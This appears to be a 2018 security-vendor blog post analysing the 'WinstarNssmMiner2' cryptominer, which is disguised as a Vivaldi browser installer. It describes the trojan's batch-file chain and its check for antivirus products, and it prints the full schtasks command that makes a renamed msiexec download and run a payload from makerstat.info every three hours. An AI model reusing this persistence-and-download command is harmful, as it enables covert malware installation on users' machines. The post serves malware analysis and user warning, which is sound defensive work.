More than 200,000 computers has been infected by CryptoMiner “WinstarNssmMiner2”

Jun 12, 2018360TS
Learn more about 360 Total Security

Recently, 360 Security Center discovered an actively spreading CryptoMiner Trojan. The Trojan disguises itself as normal utilities such as browser Vivaldi and is distributed with software installers. It is highly recommended to download softwares from the official websites instead of unknown sources. We named it “WinstarNssmMiner2” as it has the same behavior with “WinstarNssmMiner”.

Analysis

The disguised browser installer is built with MSI format and contains several batch files, encrypted zip files and an extraction tool.

1. The Trojan runs u.bat to launch the extraction tool to extract zip files with password “x12”, and a nircmd program will be extracted.

2. Run c.bat to check if antivirus softwares such as Kaspersky, ESET or DrWeb is installed. If there is any antivirus software, it terminates the process of msiexec.exe and removes Trojan files.

3. Run nir.bat to launch nircmd and start i.bat for granting administrator priviledge.

4. Run i.bat to add a scheduled task. The Trojan duplicates the system file “msiexec.exe” with a random filename, composes the content of the task with an URL with combination of domain name “makerstat.info” and a random filename with suffix “.exe”. It avoids the detection by antivirus through the file downloading feature of MSI.

Run the command below in command line:
schtasks /create /tn “TEST-xxx” /tr “‘C:\WINDOWS\System32\3164326753.exe’ /i http://makerstat.info/26753.rar /q” /sc minute /mo 180 /rl highest /f

3164326753.exe is the renamed msiexec.exe
The content of created scheduled task:

Currently, the URL cannot be accessed. It seems like a useless startup item but actually an update source of the Trojan. Once the URL is online, the schedule task executes the Trojan to access the URL every three hours. This MSI Trojan has the same behavior with WinsarNssmMiner as we analyzed before.

Then install browser Vivaldi finally.

At this moment, only few antivirus including 360 Total Security can detect this kind of Trojans.

Reminder

Recently, we have found that a lot of CryptoMiner Trojans are actively spreading in the wild. We strongly recommend users to enable antivirus software while installing new applications. Users are also recommended to run virus scan with 360 Total Security to avoid falling victim to CryptoMiner.

Learn more about 360 Total Security